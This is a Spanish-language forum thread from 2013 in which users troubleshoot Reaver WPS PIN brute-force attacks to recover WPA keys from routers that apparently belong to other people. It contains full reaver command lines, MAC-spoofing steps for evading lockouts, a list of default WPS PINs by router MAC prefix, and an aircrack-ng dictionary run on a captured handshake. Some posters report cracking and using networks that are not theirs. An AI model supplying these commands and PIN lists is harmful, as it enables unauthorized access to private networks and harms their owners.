... Pero de ahí no pasó. Lo dejé esperando 48 horas más y nada, se repite constantemente el error 0x2 y 0x03 y el porcentaje queda permanentemente en 99% sin lograr sacar la clave.

¿Estoy haciendo algo mal?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 2 Abril 2013, 16:50 pm
Buenas...
Gracias C4TW0M4N
He probrado el comando reaver -i mon0 -b (bssid) -c (canal)-a-v-s-x10-r100:10-l60 -c... Me da varios errores y tengo dudas...
Al final de la única forma que me funciona es de la siguiente:

reaver -i mon0 -b A0:21:B7:XX:XX:XX -c X -a -v -s -x 10 -r 100:10 -l 60 -vv

Dejando espacios, pero se me queda clavado en

  • Switching mon0 to channel 6
  • Waiting for beacon from A0:21:B7:D9:E8:09

Y no se ve ningún progreso (ni errores, ni porcentajes,ni pin q está probando) colocando el comando -vv no se tendría que poder ver todo esto....

Hay algún error??? Estoy haciendo algo mal??
Gracias de nuevo...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Bl4ck3lf en 2 Abril 2013, 17:04 pm
Citar
Una consulta. Probé con el siguiente comando:

reaver –i mon0 –b (BSSID) -c (canal) -vv

A pesar de darme error 0x02 y 0x03 (WPS Transaction Failed) el porcentaje siguió aumentando y al cabo de unas 8 horas el PIN ya estaba en 99%.....

... Pero de ahí no pasó. Lo dejé esperando 48 horas más y nada, se repite constantemente el error 0x2 y 0x03 y el porcentaje queda permanentemente en 99% sin lograr sacar la clave.

¿Estoy haciendo algo mal?

shinichi999 ¿qué red estas intentando auditar?. Hay algunos routers que llegan al 99% y nunca te darán el pin, puede ser ese tu caso. Danos mas información de la red y si puede ser del router.

maik78 yo probaría con el comando básico como el de mi respuesta anterior a ver si de esa manera logra conectarse al canal y tal, y si quieres y el router responde al ataque, ir añadiendo opciones como te ha recomendado C4TW0M4N.

Saludos!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 2 Abril 2013, 22:32 pm
Una consulta. Probé con el siguiente comando:

reaver –i mon0 –b (BSSID) -c (canal) -vv

A pesar de darme error 0x02 y 0x03 (WPS Transaction Failed) el porcentaje siguió aumentando y al cabo de unas 8 horas el PIN ya estaba en 99%.....

... Pero de ahí no pasó. Lo dejé esperando 48 horas más y nada, se repite constantemente el error 0x2 y 0x03 y el porcentaje queda permanentemente en 99% sin lograr sacar la clave.

¿Estoy haciendo algo mal?

No leer las 72 paginas..  :laugh: ya se hablo del error de 99% cambia la versión de reaver o utiliza un diccionario completo.

shinichi999 ¿qué red estas intentando auditar?. Hay algunos routers que llegan al 99% y nunca te darán el pin, puede ser ese tu caso. Danos mas información de la red y si puede ser del router.

Es una A0:21:B7:

Si pones el pin completo y te salta a 90% no esta bien el pin, sino que tienes los primeros 4 seguros.. cambia el ataque y pon solo los primeros 4.. ya que es una red muy crackeable:

Código:
MAC Address WPS PIN
========================
A021B7 41252147
A021B7 39149138
A021B7 5400XXXX
A021B7 80324560
A021B7 81121496
a021b7 47624313
A021B7 11352464
a021b7 22813503
A021B7 82581507
A021B7 25815078
a021b7 33440279
A021B7 86559256
A021B7 43454044
A021B7 8067XXXX
A021B7 43135479
A021B7 51920104
A021B7 15880208
A021B7 53134424
A021B7 72218013
A021B7 01874341
A021B7 8990XXXX
A021B7 2734XXXX
A021B7 1441XXXX
A021B7 71202358
========================
by WPSdb.site40.net



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 4NTR4X13 en 3 Abril 2013, 11:16 am
Hola Maik, no hay por que dar las gracias, solo intento ayudar con lo que en su dia a mi tambien me creo dudas.Creo que uno de los problemas es que el router te bloquee la mac, así que vamos a cambiar nuestra mac.je je je
Prueba con esto:
Ifconfig down wlan0
Macchanger -m (copia una mac al azar de las que te salga cuando pasas airodum-ng) wlan0
Ifconfig wlan0 up
Reaver -i mon0 (bssid)-c(canal)-a-v-s-x10-r100:10-l60-p (pon los 4 primeros digitos del ultimo pin, sí, ese el del 99%)

Al cambiar la mac desde la que auditas, si fuera el caso de que el router bloquea la mac al llegar al 99, se supone que deberia darte resultado este metodo.
Si quieres saber en que pin se queda, en vez de auditar desde la shell intentalo desde minidwep de wifislax, pero ten en cuenta que tienes que cambiar la configuracion de los comandos que vienen por defecto en esa tool. Suerte!!!!!! :P


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luni en 3 Abril 2013, 17:40 pm
Muy buenas !! Estoy adentrándome en este mundillo y la verdad que ando un poco perdida, eso si aprendiendo poco a poco, tengo una antena approx Ralink RT 2720+RT2770, y he estado utilizando el método reaver desde wifiway, el problema es que al llegar al 99.99 % se queda pillado enviando siempre el mismo pin 52619649, por ultimo me ha puesto key cracked in 7126 seconds WPS pin: 52619649 y nada más.
Inicialmente activo la interface en modo monitor airmon-ng start wlan1, para activar mi antena ralink, perdonar si son datos básicos pero llevo menos de un mes enrreando :)
La red es una WLAN_XXXX
8C:0C:A3
¿Hay algo que hago mal? o simplemente me olvido del tema....
Un saludo!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 3 Abril 2013, 18:10 pm

Si te llega al 99 % sin darte la clave, si utilizas wifislax 3.4, abre una consola y pon reaver-wifislax -i mon0 -b XX:XX:XX:XX:XX:XX -p (pon solo los 4 primeros numeros) -vv y dejalo correr. Se te iniciara por el 50%, solo tienes que dejarlo hasta que te de la clave salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luni en 3 Abril 2013, 18:44 pm
podría hacer lo mismo con wifiway? es el programa que tengo y por lo tanto con el que trabajo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 3 Abril 2013, 21:22 pm
podría hacer lo mismo con wifiway? es el programa que tengo y por lo tanto con el que trabajo.
Pues no lo se podrias intentalo cambianso solo el nombre poniendo reaver-wifiway y todo lo demas y probar pero yo solo lo he probado con wifislax 4.3 y me ha sacado las redes 8C:0C:A3


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 3 Abril 2013, 21:33 pm
Ese tipo de router está bastante bien protegido contra el reaver, no sé hasta que punto es vulnerable, por otro lado wifiway está desactualizado si no me equivoco ahora mismo la vanguardia es wifislax para el tema wifi al menos, :-).


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Bl4ck3lf en 4 Abril 2013, 00:40 am
Citar
por ultimo me ha puesto key cracked in 7126 seconds WPS pin: 52619649 y nada más.

 :huh:¿Has probado el pin que te ha dado? :huh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 4 Abril 2013, 11:37 am
Buenas...
Estoy probando lo que me habéis dicho:

C4TW0M4N cuando pongo el comando ifconfig down wlan0 me sale un error
Wlan0: nombre de host no encontrado
Ifconfig: --help give usage information
De q puede ser el error??? No me reconoce el chipset?? Probaré con el comando sudo

Bl4ck3lf estoy también probando el comando normal, lo he dejado toda la noche y esta mañana tenía 7'5%. He guardado la sesión y luego la seguiré. Espero no tener problemas estoy con la distro wifislax 4.4 en dvd live...

Ya q estoy.... he intentado montarla en virtual con VMware player pero no me reconoce ninguna la tarjeta de red, a que puede ser debido??

Gracias por la ayuda,
Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Bl4ck3lf en 4 Abril 2013, 16:02 pm
maik78 si estas usando un live cd has perdido la sesión... si quieres guardar sesiones y tal instala el SO en el HDD.

Citar
Wlan0: nombre de host no encontrado

Dos cosas: el comando es ifconfig wlanX down.
Si te sigue sacando el mismo error, pon iwconfig para ver como están nombradas tus interfaces.

Saludos y suerte!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 4 Abril 2013, 16:43 pm
Buenas... No no perdí la sesión, puedo decir q leer el foro sirve... Gracias a esto coloqué el archivo que te crea al guardar la sesión en el escritorio en un usb y al iniciar el live cd lo pasas de nuevo al escritorio y con el comando reaver -i mon0 -b (besid) -s (ubicación del archivo guardado) continúa por donde te habías quedado.

Pruebo lo q me dices.

Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luni en 4 Abril 2013, 18:52 pm
Seguí los pasos poniendo reaver -wifiway -i mon0 -b XXXXXX -p (solo los 4 primeros dígitos y me ha arrancado desde 90% enviando diferentes pins 5261.... y la verdad que estaba funcionando bastante bien y rápido, pero como marca la tradición  :D en el 99.99% se ha quedado enviando siempre el mismo pin.
La verdad que no se bien donde reside el problema, así que estoy pensando en probar con wifislax.... ¿que opináis?
Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: valdomero en 4 Abril 2013, 20:09 pm
Seguí los pasos poniendo reaver -wifiway -i mon0 -b XXXXXX -p (solo los 4 primeros dígitos y me ha arrancado desde 90% enviando diferentes pins 5261.... y la verdad que estaba funcionando bastante bien y rápido, pero como marca la tradición  :D en el 99.99% se ha quedado enviando siempre el mismo pin.
La verdad que no se bien donde reside el problema, así que estoy pensando en probar con wifislax.... ¿que opináis?
Un saludo.


Usando el wifislax reaver ( hay 2 mas en la distro, el 1.3 y el reaver pelao ) y metiendo los 4 digitos te arrancará desde el 50 % y no desde el 90%. A partir de ahí a mi siempre me ha dado la clave correcta y solucioné el tema del 99,99%. También puedes probar con otro reaver a ver que tal pero sin meterle los 4 digitos
Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 4 Abril 2013, 22:20 pm
Seguí los pasos poniendo reaver -wifiway -i mon0 -b XXXXXX -p (solo los 4 primeros dígitos y me ha arrancado desde 90% enviando diferentes pins 5261.... y la verdad que estaba funcionando bastante bien y rápido, pero como marca la tradición  :D en el 99.99% se ha quedado enviando siempre el mismo pin.
La verdad que no se bien donde reside el problema, así que estoy pensando en probar con wifislax.... ¿que opináis?
Un saludo.

Si te sale por el 90% quiere decir que wifiway no tiene ese comando. Pruebalo en wifislax 3.4 y pon el comando que te dije y la clave la tendras pero solo hazlo si sabes los 4 primeros pins sino se te demorara mas tiempo pero sabiendo los 4 numeros ami me tardo unas dos horas mas o menos y me dio la clave salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pablo_aldaia en 4 Abril 2013, 22:30 pm
ola, estoy en el mismo caso con una wlan_XXXX con 8C:0c:A3, la cuestion e  estudiado el reaver a la perfección, tengo la ultima version todo funciona ok, chipset rtl8187l tipico funciona al 100 por cien, se guardar y reanudar reave, la cuestion: salta sin uso de pins, y con uso de los primeros 4, me podriais decir esactamente los 4 numeros que deberia poner??????, tambien me gustaria saber si con xiaopan ultima version modificada para esta red, y sin modificar saltaria???? que debo acer para que sea el minimo tiempo??? poner los 4 pins siempre en cada caso no???? si alguien que me entienda responde porfavor!!!!! llevo 8 horas yapenas pasa del 13 o 14 por cien como podria avanzar mas rapido?????


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 5 Abril 2013, 18:41 pm
Os cuento los avances...

En la prueba que estoy haciendo con el comando normal voy por 27%... a ver hasta donde llega.

Con el comando Reaver -i mon0 (bssid)-c(canal)-a-v-s-x10-r100:10-l60-p xxxx
me pone esto y de ahí no pasa simpre haciendo los pasos previos de cambiar la mac

wifislax ~ # reaver -i mon0 -b 2C:B0:5D:XX:XX:XX -c X a-v-s-x10-r100:10-l60-p xxxx -VV

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Switching mon0 to channel 6
  • Waiting for beacon from 2C:B0:5D:D9:E0:87

No asocia??

Por otra parte lo he intentado con el minidwep que viene en el wifislax que habia utilizado para las wep, pero nunca para reaver y me surge la duda de que cuando le quiero cambiar las tools me dice esto
Sort pincodes in sequences u like only 10 digit numbers accepted. 0 means 0000-0999. 1 means 1000-1999
y me deja un numero tal que así 7896543210
Que tengo que poner para q me coloque el pin que yo quiera o los 4 primeros digitos del pin que yo quiera

Gracias...Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 6 Abril 2013, 02:12 am
Según la MAC Address es un NetGear, de ONO y no trae por defecto activado el WPS, la WPA es de 10 numeros, y el pin pueda que este rondando por el 1XXX al 5XXX.-


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luni en 7 Abril 2013, 13:53 pm
Hola de nuevo, alguien sabe desde donde puedo descargarme wifislax 3.4? Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 7 Abril 2013, 15:28 pm
Hola de nuevo, alguien sabe desde donde puedo descargarme wifislax 3.4? Un saludo.
desde google  ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 7 Abril 2013, 15:32 pm
Os cuento los avances...

En la prueba que estoy haciendo con el comando normal voy por 27%... a ver hasta donde llega.

Con el comando Reaver -i mon0 (bssid)-c(canal)-a-v-s-x10-r100:10-l60-p xxxx
me pone esto y de ahí no pasa simpre haciendo los pasos previos de cambiar la mac

wifislax ~ # reaver -i mon0 -b 2C:B0:5D:XX:XX:XX -c X a-v-s-x10-r100:10-l60-p xxxx -VV

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Switching mon0 to channel 6
  • Waiting for beacon from 2C:B0:5D:D9:E0:87

No asocia??

Por otra parte lo he intentado con el minidwep que viene en el wifislax que habia utilizado para las wep, pero nunca para reaver y me surge la duda de que cuando le quiero cambiar las tools me dice esto
Sort pincodes in sequences u like only 10 digit numbers accepted. 0 means 0000-0999. 1 means 1000-1999
y me deja un numero tal que así 7896543210
Que tengo que poner para q me coloque el pin que yo quiera o los 4 primeros digitos del pin que yo quiera

Gracias...Saludos
Has probado a poner el "-vv" en minuscula? Yo esas redes de ONO he descifrado muchas y no he tenido problema en autentificacion y los pines por lo que he visto, en estas redes van muy rapidos pueden meter hasta 1 pin por segundo y las he descifrado en 5 horas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 8 Abril 2013, 11:52 am
Buenas....
Gracias a la ayuda q me me habéis dado, he conseguido q me de la contraseña.
Os pongo los datos:
Mac: A0:21:B7
Wps pin: 47624184
WPA PSK: X4762418XX
SSID: ONOXXXX

Vale ahora viene el problema... La he probado está mañana deprisa, le he puesto la WPA PSK y no me ha conectado a la red... A q puede ser debido??? Puede q no sea la contraseña, q este tenga un bloqueo y lance contraseña errónea? O por la configuración de mi ordenador??

Saludos....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 8 Abril 2013, 18:02 pm
Buenas....
Gracias a la ayuda q me me habéis dado, he conseguido q me de la contraseña.
Os pongo los datos:
Mac: A0:21:B7
Wps pin: 47624184
WPA PSK: X4762418XX
SSID: ONOXXXX

Vale ahora viene el problema... La he probado está mañana deprisa, le he puesto la WPA PSK y no me ha conectado a la red... A q puede ser debido??? Puede q no sea la contraseña, q este tenga un bloqueo y lance contraseña errónea? O por la configuración de mi ordenador??

Saludos....
Pues si dices que la has probado deprisa, alomejor te has equivocado en algun numero.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Bl4ck3lf en 8 Abril 2013, 18:41 pm
maik78 me alegra que al final lo hayas conseguido. Me gustaría que nos dijeras con que comando del reaver al final has conseguido romperla.

En cuanto a que no se conecte, me paso exactamente lo mismo, lo probé deprisa después de toda la noche para romper la contraseña y no se conectó.
Soluciones, prueba a poner otra vez la contraseña, OJO, la contraseña no el PIN.
Si aun así no se conecta como en mi caso intenta conectarte con el PIN, no con la contraseña. Te preguntarás, ¿y como hago eso?. En mi caso, al tener un adaptador alfa, este trae en su software la opción de conectarte a las redes mediante el PIN WPS. En tu caso, y según he leído, tienes que hacer lo mismo que hice yo pero con el software de gestión de redes de tu adaptador inalámbrico.

Te dejo un enlace por si no me entiendes.

http://www.wifidel.com/conectarse-a-una-red-wifi-con-wps-pin/

Saludos y suerte!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Yeray_21 en 8 Abril 2013, 19:23 pm
Hola llevo tiempo intentando sacar la contraseña con el reaver 1.4 y ya no sé que hacer. He buscado por todo el foro y no hay manera! He intentado forzar una vodafoneXXXX 5C:4C:A9 y se ha bloqueado...
Ahora estoy intentando sacar una Orange-xxxx con mac 84:9C:A6 y tengo miedo de que se bloquee. Alguien sabe como encontrar el pin fiable para esas dos macs?

Saludos! ^^


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 8 Abril 2013, 21:37 pm
Buenas estoy intentando a ver si descifro una vodafone 5C:4C:A9 el pin ya le tengo pero antes cuando no le tenia, utilice el reaver y se me bloqueo la red. Ahora la tengo desbloqueada y me se el pin pero resulta que recibo el M1, envio el M2 y ahi se queda no avanza y nunca recibo el M3. Mi pregunta es que tengo que hacer o que hay que hacer para que reciba el M3 y envie el M4? Tengo que bloquear la red para que despues ya me deje o como? Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 8 Abril 2013, 23:57 pm
Buenas....
Lo conseguí con el comando:
reaver -i mon0 -b A0:21:B7:XX:XX:XX-c X -p XXXX -vv

Fui probando los 4 primeros números de los pin q vienen por defecto, para esa mac

Si sé lo q comentas tengo la opción en el móvil de conectar por pin wps y me ha conectado sin problemas, en el pc creó q esa opción no la tengo o nunca la he visto... La buscaré y voy contando.
.
Gracias...Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 9 Abril 2013, 00:28 am
Buenas....
Lo conseguí con el comando:
reaver -i mon0 -b A0:21:B7:XX:XX:XX-c X -p XXXX -vv

Fui probando los 4 primeros números de los pin q vienen por defecto, para esa mac

Si sé lo q comentas tengo la opción en el móvil de conectar por pin wps y me ha conectado sin problemas, en el pc creó q esa opción no la tengo o nunca la he visto... La buscaré y voy contando.
.
Gracias...Saludos
Oye amigo que programa para el movil tienes para conectarte por el pin? Porque yo solo tengo opcion de conectarme bien por el pulsador o generando el movil un pinque luego meto en el router pero para conectarme al router desde el movil mediante el pin nose.que programa outilizas? Gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 9 Abril 2013, 01:46 am
maik78 me alegra que al final lo hayas conseguido. Me gustaría que nos dijeras con que comando del reaver al final has conseguido romperla.

En cuanto a que no se conecte, me paso exactamente lo mismo, lo probé deprisa después de toda la noche para romper la contraseña y no se conectó.
Soluciones, prueba a poner otra vez la contraseña, OJO, la contraseña no el PIN.
Si aun así no se conecta como en mi caso intenta conectarte con el PIN, no con la contraseña. Te preguntarás, ¿y como hago eso?. En mi caso, al tener un adaptador alfa, este trae en su software la opción de conectarte a las redes mediante el PIN WPS. En tu caso, y según he leído, tienes que hacer lo mismo que hice yo pero con el software de gestión de redes de tu adaptador inalámbrico.

Te dejo un enlace por si no me entiendes.

http://www.wifidel.com/conectarse-a-una-red-wifi-con-wps-pin/

Saludos y suerte!

No con todos los router funciona.

Hola llevo tiempo intentando sacar la contraseña con el reaver 1.4 y ya no sé que hacer. He buscado por todo el foro y no hay manera! He intentado forzar una vodafoneXXXX 5C:4C:A9 y se ha bloqueado...
Ahora estoy intentando sacar una Orange-xxxx con mac 84:9C:A6 y tengo miedo de que se bloquee. Alguien sabe como encontrar el pin fiable para esas dos macs?

Saludos! ^^

Tiempo, si yo tarde 30 dias en probar con un Thomson..

Buenas estoy intentando a ver si descifro una vodafone 5C:4C:A9 el pin ya le tengo pero antes cuando no le tenia, utilice el reaver y se me bloqueo la red. Ahora la tengo desbloqueada y me se el pin pero resulta que recibo el M1, envio el M2 y ahi se queda no avanza y nunca recibo el M3. Mi pregunta es que tengo que hacer o que hay que hacer para que reciba el M3 y envie el M4? Tengo que bloquear la red para que despues ya me deje o como? Saludos

En si, si empieza a probar te tiene que aparecer M1-2-3-4, cuando sale el 5-6 tienes los primeros 4 caracteres.

Oye amigo que programa para el movil tienes para conectarte por el pin? Porque yo solo tengo opcion de conectarme bien por el pulsador o generando el movil un pinque luego meto en el router pero para conectarme al router desde el movil mediante el pin nose.que programa outilizas? Gracias

Actualiza tu sistema, la mayoria tiene el soporte en opciones avanzadas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 9 Abril 2013, 20:15 pm
Buenas...

adrihamel en el movil, al conectarme a una red, yo tengo la opción de marcar "mostrar opciones avanzadas" y allí hay un apartado que pone wps, en este te da cuatro opciones de la que yo el pin desde punto de acceso y le colocas el pin de la red.

Si no te aparece, tendrás que probar lo que dice P4nd3m0n1um, actualizar el sistema operativo de tu movil con una rom más moderna. Si tienes android te puedo decir por privado sitios desde donde se puede hacer con tutoriales.

Ahora estoy liado intentando colocar el pin en mi portatil pero no lo consigo, hay alguna posibilidad de hacerlo desde windows o hay que tener los drivers del usb Tp-link (en esta tengo menos pontencia)

Gracias.... Saludos.


 


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 10 Abril 2013, 17:13 pm
Buenas...

adrihamel en el movil, al conectarme a una red, yo tengo la opción de marcar "mostrar opciones avanzadas" y allí hay un apartado que pone wps, en este te da cuatro opciones de la que yo el pin desde punto de acceso y le colocas el pin de la red.

Si no te aparece, tendrás que probar lo que dice P4nd3m0n1um, actualizar el sistema operativo de tu movil con una rom más moderna. Si tienes android te puedo decir por privado sitios desde donde se puede hacer con tutoriales.

Ahora estoy liado intentando colocar el pin en mi portatil pero no lo consigo, hay alguna posibilidad de hacerlo desde windows o hay que tener los drivers del usb Tp-link (en esta tengo menos pontencia)

Gracias.... Saludos.


 
Yo tengo la version de android 4.0.4 y cuando me meto en las redes, tengo esa opcion de "opciones avanzadas" y le doy en wps pero no me sale para poner el pin del router y conectarme, sino que el movil me genera un pi para yo luego meterlo en el router. Que version de android tienes? Pues si me puedes decir la pagina me seria de gran ayuda. Yo hace tiempo vi un programa para windows en el que metes el pin y te conecta automaticamente. Si le encuentro te digo el nombre


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 10 Abril 2013, 17:15 pm
Hoy he visto una red nueva de JAZZTEL_XXXX y me ha dado por mirar la mac. Creo que son las ultimas de jazztel porque no me suena su mac. Es F8:8E:85, tiene seguridad wpa-psk aes, y no tiene el wps activado. Alquien tiene datos?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 11 Abril 2013, 18:05 pm
Buenas...

adrihamel tienes un privado.

Tengo un problema, la red que conseguí descifrar me sale ahora estableciendo conexión y no me conecta... La he borrado, he puesto de nuevo el pin y no me conecta... es como si no le hubiera puesto nada ni conecta, ni me sale come guardada.

Que puede haber pasado?? Le ha cambiado el pin? Le ha cambiado la contraseña?
O la configuración del router?

Gracias... Saludos.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lekaja en 11 Abril 2013, 19:16 pm
Hoy he visto una red nueva de JAZZTEL_XXXX y me ha dado por mirar la mac. Creo que son las ultimas de jazztel porque no me suena su mac. Es F8:8E:85, tiene seguridad wpa-psk aes, y no tiene el wps activado. Alquien tiene datos?
hace un par de dias me llego un router comtrend,con la compañia JAZZTEL, y no tiene el wps y la contraseña es de 20 caracteres mezcla de letra mayuscula,numeros y letras minuscula con mac F8:8E:85 donde las ultimas cifras de la MAC coinciden con las ultimas cifras del essid si desean mas informacion para un estudio  ;-) que se comuniquen conmigo por mp un saludo a todos  ;D ;D ;D




Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 11 Abril 2013, 23:12 pm
Buenas...

adrihamel tienes un privado.

Tengo un problema, la red que conseguí descifrar me sale ahora estableciendo conexión y no me conecta... La he borrado, he puesto de nuevo el pin y no me conecta... es como si no le hubiera puesto nada ni conecta, ni me sale come guardada.

Que puede haber pasado?? Le ha cambiado el pin? Le ha cambiado la contraseña?
O la configuración del router?

Gracias... Saludos.


Una pregunta, cuando te conectas a la red, que metes el pin o a clave? porque si metes el pin como siendo la clave, no te va a conectar aun siendo ese el pin del router, tienes que poner la clave wpa2-psk. Si no te conecta, vuelve al reaver y pon reaver -i mon0 -b XX:XX:XX:XX:XX:XX -p XXXXXXXX (pones los 8 numeros) -vv y si te lanza el pin y la clave pues copiate la clave y la insertas en la red cuando estes en windows y te conectara.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 12 Abril 2013, 09:58 am
Buenas...

Si, me conecto por pin, no me deja por clave wpa psk, le coloco los 8 numeros. Está todo correcto, ayer no me iba, se ve que se esta con ojo avizor y le cambio algún parametro, el caso es que ahora sí me conecta bien.

Ahora estoy liado con una Orange-xxxx con  C0:AC:54, el pin por defecto que tengo es el "tan dificil de sacar" 12345670, pero no me funciona.

Hay otros pin por defecto?

Saludos... Gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luni en 12 Abril 2013, 11:03 am
Bueno compañeros, después de mucho sufrimiento lo he conseguido!! y con wifislax!!
Gracias por la ayuda, saludos!!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 13 Abril 2013, 12:51 pm
Buenas...

Si, me conecto por pin, no me deja por clave wpa psk, le coloco los 8 numeros. Está todo correcto, ayer no me iba, se ve que se esta con ojo avizor y le cambio algún parametro, el caso es que ahora sí me conecta bien.

Ahora estoy liado con una Orange-xxxx con  C0:AC:54, el pin por defecto que tengo es el "tan dificil de sacar" 12345670, pero no me funciona.

Hay otros pin por defecto?

Saludos... Gracias.
Pues te tienes que conectar por la clave wpa2-psk ya que la clave correcta tiene 10 digitos y si tu pones el pin que son 8 digitos pues no te va a conectar porque el router solo da por clave valida su clave y no el pin, aunque el pin sea correcto.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 13 Abril 2013, 12:54 pm
Se sabe algo de las redes de ono con mac BC:14:01?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: fregasuelos en 29 Abril 2013, 01:29 am
Hola a todos llevo varios días y no lo consigo el reaver se para al 90%
He probado el 1.4 y el 1.3
Deja de probar pines y se queda en pin 99985677
La Mac del router es A0:21:b7
He leído que ese error le pasa a mas gente, pero no me aclaro
Necesito un poco de ayuda.
El comando que pongo es
Reaver -i mon0 -b xxxxxxxxx -vv
Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: dakarpesca en 1 Mayo 2013, 01:45 am
tanto tiempo sin vernos chachos animaos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 1 Mayo 2013, 12:03 pm
Buenas...

adrihamel tienes un privado.

Tengo un problema, la red que conseguí descifrar me sale ahora estableciendo conexión y no me conecta... La he borrado, he puesto de nuevo el pin y no me conecta... es como si no le hubiera puesto nada ni conecta, ni me sale come guardada.

Que puede haber pasado?? Le ha cambiado el pin? Le ha cambiado la contraseña?
O la configuración del router?

Gracias... Saludos.


Un filtro de mac y se acabaron las conexiones a través del móvil..aunque tengas el pin y la pass correcta
Mientras no saquen un programa que permita cambiar la MAC de un dispositivo móvil,este ''problema''seguirá ahí.... :silbar:

Fregasuelos...reaver no siempre funciona como queremos.
Te explico...llevo toda la noche con un D0:AE: EC a 13 sg por pin..WIFISLAX 4.3 etc,etc
con reaver desde 0 y al 20,34% me dice que ha probado hasta 22285676
BIEN..PERO OBSERVAD ESTE DETALLE,ES IMPORTANTÍSIMO
Si le meto un pin previo,me dice que con el 0718 se pone al 91,69%..Y ESO NO PUEDE SER,PORQUE DESDE 0 YA HABÍA REPASADO ESE PIN REAVER.
...lo de wifislax es porque desde xubuntu me surgen algunas trabas...no puedo especificarle pin concreto,al usar rever en bruto.
Básicamente los routers de Orange son casi invulnerables
Hasta la fecha,CASI todos los demás han caído,por uno u otro camino,ya sea con Reaver o con dicc. previo HS capturado.
Muchos pines de la BB.DD valen,otros tantos NO.
El mejor camino con reaver es dejarle hacer sin pines previos....o sea,que haga su trabajo desde 0.
Si así no hay resultados,buscad otro router o esperad a que alguien dé con la tecla.
Reaver no sirve para nada si el WPS está desactivado...no lo olvidéis.
AL FINAL,TODOS LOS CAMINOS SIN DICCIONARIO CONDUCEN A REAVER


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 1 Mayo 2013, 13:08 pm
wpakill@MMXIII:~$ sudo aircrack-ng -w /home/wpakill/Escritorio/dicc.XXXX  /home/wpakill/Escritorio/hs-D0-AE-EC-XX-XX-XX.cap
Opening /home/wpakill/Escritorio/hs-D0-AE-EC-XX-XX-XX.cap
Read 2994 packets.

   #  BSSID              ESSID                     Encryption

   1  D0:AE:EC:EXXXX:XX  WLAN_XXXX                 WPA (1 handshake)

Choosing first network as target.

Opening /home/wpakill/Escritorio/hs-D0-AE-EC-XX-XX-XX.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r2230
Passphrase not in dictionary

Esto es una captura de mi consola,obteniendo un Handshake de la red,creando un diccionario con wpamagickey y pasándole el aircrack-ng.
Peeeero..existe un problemilla,el wpamagick key no contempla esa MAC
y en la opción por ''defecto'' el resultado es obvio,a pesar del handshake.
CONCLUSIÓN
Al igual que Reaver,si no reúno los requisitos mínimos para utilizar los programas,como essid ó bssid compatibles,ó wps activado,ó chipset compatible...nunca obtendré resultados correctos.
